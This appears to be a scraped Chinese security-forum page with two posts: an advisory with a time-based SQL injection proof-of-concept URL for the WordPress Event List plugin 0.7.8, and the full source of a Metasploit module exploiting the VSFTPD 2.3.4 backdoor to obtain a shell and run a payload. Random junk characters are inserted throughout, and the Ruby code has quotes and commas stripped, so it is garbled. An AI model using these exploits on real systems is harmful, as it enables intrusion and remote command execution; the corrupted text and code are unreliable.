7 C3 ?# D1 {* q# B( b公告：https://www.sitedirsec.com公布最新漏洞，请关注

loye13

WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞

---

1. Description:1 M  G/ d2 v/ G0 D0 v
  $ B: k/ Q/ E7 H) F
     . k8 J0 i6 r: [3 K
  
  A2 J+ I4 t5 h5 ?- x8 K+ `+ wSQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
- d* Q$ T  {. p6 T( J( v# S+ jallows an authenticated user to execute arbitrary SQL commands via the id  d- p+ M) z7 J5 J$ {
parameter to wp-admin/admin.php.
. ?( F# D0 R  }7 M+ v& v  
( B% `  N1 E' b   * D% Y+ e" D/ ^, ^1 T9 b* B
  
4 z. x4 r6 u! u/ x2. Proof of Concept:
; l4 Z1 B2 L0 a- y! w; o0 ?  8 y. x. H' N8 _) \
   
# g0 m$ g: f! V; Y3 {1 X/ c$ {  
, y: t5 B$ L1 r$ |% K5 ~http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id5 Y: N9 k) c, \$ [4 m1 h
=1 AND SLEEP(10)
: Z! e% U+ L- `% P# m2 y  u
' d4 O" ?" S- V" T5 ~) a/ Y  8 L5 e5 b; \$ f4 t# r, P- f5 V
   
' w# t& d& e2 y/ q0 X0 H& g  ( W8 Y6 J- v' D  v; x& D$ X
3. Solution:, b6 l+ g' H! }0 w- S7 t9 b
  ( c. ]; P, n' R
     
" ~' }4 |& a- j: B; u. S  
% F5 L5 `, D# }& LThe plugin has been removed from WordPress. Deactivate the plug-in and wait
, ?2 B" }, U0 F9 Z+ afor a hotfix.  h8 e, y+ v5 `/ x
  
& Q, J, T, c" _4 J# F3 b   1 B. r9 |' a" C6 T
  4 C. B$ f1 }, b; i/ z' R! O
4. Reference:
! ~. x* z7 j- ^% B& n: W  * [0 I& p4 H/ O, C  N
   
+ U8 q# }0 |6 ]  R1 `; ?  5 x( m" V# p7 ]) o
http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje/ p" {2 b7 s1 P, g) `. Z
ction-sqli/6 K: A- }9 l, q' }3 @0 `
  ! v' C& r. D9 v* t
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429+ R8 h$ @7 J9 R

9 \. A" [8 L9 N$ j6 v+ K1 k' A* n. Q) {. _( D$ C8 i, @

) |" H. f7 @/ G
& [5 i' i; R4 D5 Z! L9 }/ a) X4 J6 V  Z* ]5 v$ i

: V& c3 y5 y! g# }
" _7 X  l" I  ~+ }
9 S1 v" `$ h9 W$ W. H
* u3 r$ l. E3 M7 D2 l8 D. O- a( X$ f# |- }% B0 u
: U9 V, `* h/ \, j; J

6 ^' _) I! a( {1 Y4 R6 F& U0 D+ U' M' |' L
. @9 Y( o" O4 _: C

  V9 B: w$ v! v, K: f) l6 }& ?. t7 y* }1 F7 _0 T
# B6 ^/ @+ o1 W# l* X8 f: g
1 g6 U, }6 c  w  a/ Z
公告：https://www.sitedirsec.com公布最新漏洞，请关注

hushui8878

VSFTPD v2.3.4 Backdoor 命令执行漏洞

---

################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################/ F/ X* q$ d3 ~

4 N# e6 v0 u9 x) R# [& c2 W1 n  c0 p6 f

  E7 j6 d6 q+ {3 i  h# vrequire msf/core& ~5 ?# L9 f8 N, d

* I& Z& y4 o7 ^6 a$ J8 e& R) Xclass Metasploit3 < Msf::Exploit::Remote1 p) D+ _. P7 o) v
Rank = ExcellentRanking
4 D* y* `/ v) F& \% F7 C
6 y2 r( n; j7 c  \8 oinclude Msf::Exploit::Remote::Tcp
- J. z1 N( Y$ j; y4 \/ N
2 t( X6 ?) c* Udef initialize(info = {})
+ h' P: a; \' r$ p) Y( t# {super(update_info(info; p' A/ G' c$ S2 b; G
Name => VSFTPD v2.3.4 Backdoor Command Execution! [) }# k2 [& O5 f  ^8 Y. a5 l- T
Descript_ion => %q{
9 S/ B) p; o* {; y! Z$ ~) {6 vThis module exploits a malicious backdoor that was added to the VSFTPD download. l" E5 f& F* f2 R2 I
archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between! ]* s8 K7 I3 _
June 30th 2011 and July 1st 2011 according to the most recent information9 G# ~6 F6 y3 ]
available. This backdoor was removed on July 3rd 2011./ A3 L( v+ U+ y
}
" A) I: ^! W  O2 Y5 t5 m- jAuthor => [ hdm mc ]
( F& C. O6 ~0 p. {4 tLicense => MSF_LICENSE
* k/ p- L! @" f! P( Y' }Version => $Revision: 13099 $
& O' _3 d$ D- N8 N: U* TReferences =>0 G3 S* x, b3 n: N' Z. @+ h
[
3 P# D  Y7 C" b- S9 |[ URL http://pastebin.com/AetT9sS5]% M. {0 M. k- y1 e9 V. ]7 w
[ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
. S1 R' Q! _- [1 p]
% e0 d/ z& O- @& B: C, KPrivileged => true
2 A; ]8 y! x1 [Platform => [ unix ]
( I) @7 `8 Q: k1 b% i$ O( L2 V) dArch => ARCH_CMD$ G( P, I: C3 T4 Q0 z
Payload =>
6 e% K/ _# g9 t3 A6 s{
. c$ D3 n& Q$ H# K5 m* uSpace => 20008 H' j- B: \! B, |
BadChars =>
* ^/ R" Q$ Z! ]' ]4 c$ NDisableNops => true
1 N# i- D0 ?  h7 cCompat =>. K2 x2 _, I8 u+ D
{
' Y* F) R8 K* pPayloadType => cmd_interact# H$ d5 _2 `+ @6 q
ConnectionType => find$ }$ [8 u/ t. u3 W: H' A, u
}
% G  M' C+ P) D% C6 S9 m}
8 @% l3 J; Q& v! V8 a: x/ K+ YTargets =>
9 q, e# X- S! s! n, N: r* d[
! Z- @( |! S/ H2 X[ Automatic { } ]$ ?/ X* ^7 i0 B% T
]
  ~$ E% ^5 G8 k! UDisclosureDate => Jul 3 2011
* E' _% a, g8 i7 G% I$ BDefaultTarget => 0))
  A; [* h7 D* l0 H# a* }( h* b# o& o
register_options([ Opt::RPORT(21) ] self.class)' c% J$ h8 z4 q2 a( o5 b
end8 T3 Y+ W# _* S3 {4 q# F

$ M. A: s- ~: b' ], Qdef exploit# B0 d* N( L; F3 S- S! |

( b& E! x3 M; K, ~nsock = self.connect(false {RPORT => 6200}) rescue nil" z, i/ q+ w# U- E2 n; y4 X/ s2 J* Q
if nsock2 s' T/ N5 Y6 Y
print_status(The port used by the backdoor bind listener is already open)2 S8 J+ a& C+ f4 b9 e% }0 t
handle_backdoor(nsock)8 {' @  P1 V6 ~
return
: i1 t- F8 n# A+ bend  e  q" c& H' h, E

5 M& p/ s. z& ~0 T& w# d# X( M/ c# Connect to the FTP service port first8 u$ {! |: y4 z: ^
connect) E/ S" C+ e0 V$ {0 ^
; S. D% R% u1 H" o1 f
banner = sock.get_once(-1 30).to_s
3 I7 L3 W; c* B- A9 b2 ?print_status(Banner: #{banner.strip})( k$ v5 B  ]( X1 {

9 N  m' B. e5 {4 _- `* k+ x3 }sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)
; o# I! h2 n- V6 J)
0 v/ E! R* H$ x8 @% yresp = sock.get_once(-1 30).to_s
& k6 v- w0 g1 z2 R9 y2 u' Vprint_status(USER: #{resp.strip})
& u  e# G, g; ~+ T: ~2 H2 s; C
# i) a7 H6 _9 `if resp =~ /^530 /9 {* Z) h8 ^  F% {& }
print_error(This server is configured for anonymous only and the backdoor code cannot be reached)
7 E, K  Z, i% Y" _disconnect
0 M" t. o; R! F" ?+ ^% R8 r8 Mreturn. @+ B5 p5 O  U+ W5 ^0 {
end
; f  a7 B$ |" k7 H/ k! E
1 v* ?2 J6 Y- k$ t5 Y7 x% Yif resp !~ /^331 /' G& J1 N% E( H* y+ D
print_error(This server did not respond as expected: #{resp.strip})
% h8 J$ f: K* W+ I* {disconnect
- P- |# d2 `) O# T% Rreturn
3 @! x$ i2 n1 ]# H6 qend6 G. t) y2 q1 S
( V" B; H, i& W7 n( l7 m
sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}; t( `  j( j6 q7 y9 r
)
6 J; w8 M, a: {4 i7 Q/ N- S/ p' N
9 S' u7 Y! e" a7 m: i, a# Do not bother reading the response from password just try the backdoor
) D  O7 h( A  m4 S8 i( a9 qnsock = self.connect(false {RPORT => 6200}) rescue nil
; d) a8 U; S9 B; b2 Wif nsock5 o7 q2 y7 u0 f3 B" f5 ~
print_good(Backdoor service has been spawned handling...)* K; W3 f$ P8 l  |$ ~4 {
handle_backdoor(nsock)) Y) b0 r: v4 j7 t" L% l* ~
return
: V$ Q( L/ m7 A4 nend
! O, ?6 e; v1 Q3 p2 s) I3 v" y2 }8 C& I1 G! n2 k6 z& p- s( X. w+ W! H
disconnect
2 c3 c0 t# N6 Q5 C3 G1 D
( u9 i/ G+ ^' {1 k! W6 z2 a5 p. V) `end: H( S/ x7 D: G) z! F
6 c5 D. {1 Y; S, c& S& ^
def handle_backdoor(s)
. |! |, d- g4 i8 x7 T& N9 k5 @1 _% W* ?& p# Z5 J
s.put(id" B! O9 D# {+ z% [, \
)
' t2 v; q/ n/ ^" U& b, _& f) N/ T8 x, B/ a4 P. W' u
r = s.get_once(-1 5).to_s
, i: U& h8 G0 v. _% _if r !~ /uid=/
. ?  S" C0 A9 W  @print_error(The service on port 6200 does not appear to be a shell)4 s# N/ s) [5 v+ r% Q
disconnect(s)/ J: s  Z, E* E$ X
return
" O  P# b# j$ Eend
' ^& C1 Y+ ]7 r9 ~4 ~( y5 j- o2 n: K5 g
print_good(UID: #{r.strip})2 {; [7 y2 g9 e; I/ \3 v% d9 F9 ]7 ^$ Z

$ Y5 R/ J9 C: a. ss.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)
6 H8 R5 p1 W- C! ]' Khandler(s)! d) T* i9 Y4 ?" d6 R' \/ M- H
end
9 h/ L2 F  w! k" D' W- w$ f+ f0 p! u7 ?
end复制代码
0 w8 S% V6 f. K: H6 d) M3 Z+ }$ s1 G+ q3 S

. |, D9 o, [9 }3 l0 U9 D% N' d
! {* Z! T. I8 _; V/ T# @2 i0 O! G
# G% k4 X( D, m  @9 ~2 |+ p! F2 C. N. v$ N

' \; }7 ^$ O  z% I  _# E6 Q* k/ Z& m* w6 u
5 r+ I) F) `, x1 b& P

( l; ^( P6 U( P) Y
1 {' g- y4 F, w& U# n8 W/ w! p1 X  r
1 C, h8 d! j) g8 Y( B0 x# h

" |# {* k1 G" d
' t3 [/ Y$ ], z4 C4 V6 J
. U+ n: F7 B% l, z$ F8 N- ^2 q1 C9 D7 M7 W: A; J6 ^9 M0 T

  j2 O2 Y* d& \4 C+ U% @/ V0 D, K0 r9 {2 E; m0 M9 `% Z  n
公告：https://www.sitedirsec.com公布最新漏洞，请关注